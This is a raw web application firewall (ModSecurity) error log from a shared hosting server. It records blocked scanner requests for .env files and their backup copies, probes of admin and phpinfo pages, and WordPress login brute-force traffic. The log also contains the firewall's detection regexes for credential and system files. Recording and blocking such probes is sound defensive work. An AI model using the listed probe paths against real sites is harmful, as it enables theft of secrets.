[Tue May 26 12:53:31.814553 2026] [security2:error] [pid 461618:tid 461654] [remote 88.198.91.116:57836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVKc1yiSlSCHr1fdr2rsAAAviM"]
[Tue May 26 12:53:32.024198 2026] [security2:error] [pid 461618:tid 461749] [client 74.249.173.207:5068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahVKdFyiSlSCHr1fdr2ruAAAAIY"]
[Tue May 26 12:53:32.608177 2026] [security2:error] [pid 461618:tid 461801] [client 106.77.157.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKdFyiSlSCHr1fdr2rvgAAALo"]
[Tue May 26 12:53:32.996329 2026] [security2:error] [pid 461618:tid 461757] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKdFyiSlSCHr1fdr2rzgAAAI4"]
[Tue May 26 12:53:35.031395 2026] [security2:error] [pid 461618:tid 461843] [client 74.249.173.207:5104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVKd1yiSlSCHr1fdr2sNQAAAOQ"]
[Tue May 26 12:53:36.562913 2026] [security2:error] [pid 461618:tid 461752] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKeFyiSlSCHr1fdr2sXgAAAIk"]
[Tue May 26 12:53:36.882173 2026] [security2:error] [pid 461618:tid 461784] [client 195.178.110.34:49354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.canopykaapi.com"] [uri "/phpinfo.php"] [unique_id "ahVKeFyiSlSCHr1fdr2sbAAAAKk"]
[Tue May 26 12:53:37.194912 2026] [security2:error] [pid 461618:tid 461830] [client 195.178.110.34:49364] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/portal/.env"] [unique_id "ahVKeVyiSlSCHr1fdr2sdAAAANc"]
[Tue May 26 12:53:38.562972 2026] [security2:error] [pid 461618:tid 461865] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKelyiSlSCHr1fdr2smgAAAPo"]
[Tue May 26 12:53:39.204795 2026] [security2:error] [pid 461618:tid 461755] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKe1yiSlSCHr1fdr2sswAAAIw"]
[Tue May 26 12:53:39.549704 2026] [security2:error] [pid 461618:tid 461794] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKe1yiSlSCHr1fdr2ssgAAALM"]
[Tue May 26 12:53:39.645331 2026] [security2:error] [pid 461618:tid 461795] [client 157.20.138.61:58499] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKe1yiSlSCHr1fdr2swwAAALQ"]
[Tue May 26 12:53:39.645538 2026] [security2:error] [pid 461618:tid 461795] [client 157.20.138.61:58499] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKe1yiSlSCHr1fdr2swwAAALQ"]
[Tue May 26 12:53:40.288127 2026] [security2:error] [pid 461618:tid 461769] [client 74.249.173.207:4828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/cache.php"] [unique_id "ahVKfFyiSlSCHr1fdr2s1QAAAJo"]
[Tue May 26 12:53:40.733943 2026] [security2:error] [pid 461618:tid 461831] [client 208.84.100.109:61248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env"] [unique_id "ahVKfFyiSlSCHr1fdr2s5QAAANg"]
[Tue May 26 12:53:40.737966 2026] [security2:error] [pid 461618:tid 461818] [client 208.84.100.109:30312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/api/.env"] [unique_id "ahVKfFyiSlSCHr1fdr2s6QAAAMs"]
[Tue May 26 12:53:40.738427 2026] [security2:error] [pid 461618:tid 461875] [client 208.84.100.109:30326] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVKfFyiSlSCHr1fdr2s6AAAAQQ"]
[Tue May 26 12:53:40.741204 2026] [security2:error] [pid 461618:tid 461775] [client 208.84.100.109:30296] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/app/.env"] [unique_id "ahVKfFyiSlSCHr1fdr2s6gAAAKA"]
[Tue May 26 12:53:40.994508 2026] [security2:error] [pid 461618:tid 461794] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKfFyiSlSCHr1fdr2s8wAAALM"]
[Tue May 26 12:53:41.680401 2026] [security2:error] [pid 461618:tid 461858] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKfVyiSlSCHr1fdr2tGAAAAPM"]
[Tue May 26 12:53:42.112910 2026] [security2:error] [pid 461618:tid 461812] [client 14.173.164.89:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVKe1yiSlSCHr1fdr2suAAAxUg"]
[Tue May 26 12:53:42.774629 2026] [security2:error] [pid 461618:tid 461771] [client 74.249.173.207:4818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVKflyiSlSCHr1fdr2tTwAAAJw"]
[Tue May 26 12:53:43.914907 2026] [security2:error] [pid 461618:tid 461774] [client 176.65.139.239:20092] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.holix.ktmadvance-senegal.com"] [uri "/.env"] [unique_id "ahVKf1yiSlSCHr1fdr2tbwAAAJ8"]
[Tue May 26 12:53:44.000496 2026] [security2:error] [pid 461618:tid 461784] [client 176.65.139.237:63922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.encaf.ktmadvance-senegal.com"] [uri "/.env"] [unique_id "ahVKf1yiSlSCHr1fdr2tcwAAAKk"]
[Tue May 26 12:53:44.545071 2026] [security2:error] [pid 461618:tid 461854] [client 208.84.100.109:30280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.copy"] [unique_id "ahVKgFyiSlSCHr1fdr2tgwAAAO8"]
[Tue May 26 12:53:44.622768 2026] [security2:error] [pid 461618:tid 461819] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKgFyiSlSCHr1fdr2tdgAAAMw"]
[Tue May 26 12:53:44.989474 2026] [security2:error] [pid 461618:tid 461803] [client 45.132.227.20:47343] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVKflyiSlSCHr1fdr2tSAAAALw"]
[Tue May 26 12:53:45.114734 2026] [security2:error] [pid 461618:tid 461807] [client 195.178.110.34:40928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/env/.env"] [unique_id "ahVKgVyiSlSCHr1fdr2tlwAAAMA"]
[Tue May 26 12:53:45.210609 2026] [security2:error] [pid 461618:tid 461763] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKgVyiSlSCHr1fdr2tmAAAAJQ"]
[Tue May 26 12:53:45.625662 2026] [security2:error] [pid 461618:tid 461792] [client 173.252.79.116:50688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKgVyiSlSCHr1fdr2tpQAAsXE"]
[Tue May 26 12:53:45.914801 2026] [security2:error] [pid 461618:tid 461866] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKgVyiSlSCHr1fdr2tsQAAAPs"]
[Tue May 26 12:53:46.028601 2026] [security2:error] [pid 461618:tid 461857] [client 173.252.79.116:50700] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKgVyiSlSCHr1fdr2ttAAA8mY"]
[Tue May 26 12:53:46.047469 2026] [security2:error] [pid 461618:tid 461757] [client 208.84.100.109:30650] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env~"] [unique_id "ahVKglyiSlSCHr1fdr2tuwAAAI4"]
[Tue May 26 12:53:46.047759 2026] [security2:error] [pid 461618:tid 461800] [client 208.84.100.109:30612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.old"] [unique_id "ahVKglyiSlSCHr1fdr2tvQAAALk"]
[Tue May 26 12:53:46.047885 2026] [security2:error] [pid 461618:tid 461854] [client 208.84.100.109:30604] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.bak"] [unique_id "ahVKglyiSlSCHr1fdr2twQAAAO8"]
[Tue May 26 12:53:46.048810 2026] [security2:error] [pid 461618:tid 461780] [client 208.84.100.109:30622] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.backup"] [unique_id "ahVKglyiSlSCHr1fdr2twgAAAKU"]
[Tue May 26 12:53:46.241849 2026] [security2:error] [pid 461618:tid 461786] [client 208.84.100.109:30280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.swp"] [unique_id "ahVKglyiSlSCHr1fdr2tyQAAAKs"]
[Tue May 26 12:53:46.439038 2026] [security2:error] [pid 461618:tid 461850] [client 208.84.100.109:30340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.orig"] [unique_id "ahVKglyiSlSCHr1fdr2tzwAAAOs"]
[Tue May 26 12:53:46.439037 2026] [security2:error] [pid 461618:tid 461856] [client 208.84.100.109:30288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.bak"] [unique_id "ahVKglyiSlSCHr1fdr2t0AAAAPE"]
[Tue May 26 12:53:46.440346 2026] [security2:error] [pid 461618:tid 461758] [client 208.84.100.109:30794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.swp"] [unique_id "ahVKglyiSlSCHr1fdr2t0QAAAI8"]
[Tue May 26 12:53:46.443035 2026] [security2:error] [pid 461618:tid 461840] [client 208.84.100.109:30784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production~"] [unique_id "ahVKglyiSlSCHr1fdr2t1QAAAOE"]
[Tue May 26 12:53:46.443902 2026] [security2:error] [pid 461618:tid 461829] [client 208.84.100.109:30762] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.backup"] [unique_id "ahVKglyiSlSCHr1fdr2t2AAAANY"]
[Tue May 26 12:53:46.444515 2026] [security2:error] [pid 461618:tid 461807] [client 208.84.100.109:30752] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.old"] [unique_id "ahVKglyiSlSCHr1fdr2t1AAAAMA"]
[Tue May 26 12:53:46.444790 2026] [security2:error] [pid 461618:tid 461779] [client 208.84.100.109:30714] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local~"] [unique_id "ahVKglyiSlSCHr1fdr2t1wAAAKQ"]
[Tue May 26 12:53:46.445915 2026] [security2:error] [pid 461618:tid 461781] [client 208.84.100.109:30732] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.orig"] [unique_id "ahVKglyiSlSCHr1fdr2t1gAAAKY"]
[Tue May 26 12:53:46.445927 2026] [security2:error] [pid 461618:tid 461809] [client 208.84.100.109:30696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.old"] [unique_id "ahVKglyiSlSCHr1fdr2t2QAAAMI"]
[Tue May 26 12:53:46.446067 2026] [security2:error] [pid 461618:tid 461803] [client 208.84.100.109:30796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.orig"] [unique_id "ahVKglyiSlSCHr1fdr2t0wAAALw"]
[Tue May 26 12:53:46.446112 2026] [security2:error] [pid 461618:tid 461831] [client 208.84.100.109:30744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.bak"] [unique_id "ahVKglyiSlSCHr1fdr2t3wAAANg"]
[Tue May 26 12:53:46.446215 2026] [security2:error] [pid 461618:tid 461823] [client 208.84.100.109:30718] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.swp"] [unique_id "ahVKglyiSlSCHr1fdr2t4AAAANA"]
[Tue May 26 12:53:46.447273 2026] [security2:error] [pid 461618:tid 461853] [client 208.84.100.109:30706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.backup"] [unique_id "ahVKglyiSlSCHr1fdr2t3AAAAO4"]
[Tue May 26 12:53:46.449270 2026] [security2:error] [pid 461618:tid 461763] [client 208.84.100.109:30742] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.copy"] [unique_id "ahVKglyiSlSCHr1fdr2t2wAAAJQ"]
[Tue May 26 12:53:46.450474 2026] [security2:error] [pid 461618:tid 461752] [client 208.84.100.109:30360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.copy"] [unique_id "ahVKglyiSlSCHr1fdr2t0gAAAIk"]
[Tue May 26 12:53:46.565218 2026] [security2:error] [pid 461618:tid 461811] [client 173.252.79.10:59536] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKglyiSlSCHr1fdr2tzQAAxEU"]
[Tue May 26 12:53:47.089061 2026] [security2:error] [pid 461618:tid 461863] [client 173.252.79.1:52654] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKglyiSlSCHr1fdr2uDwAA-Gc"]
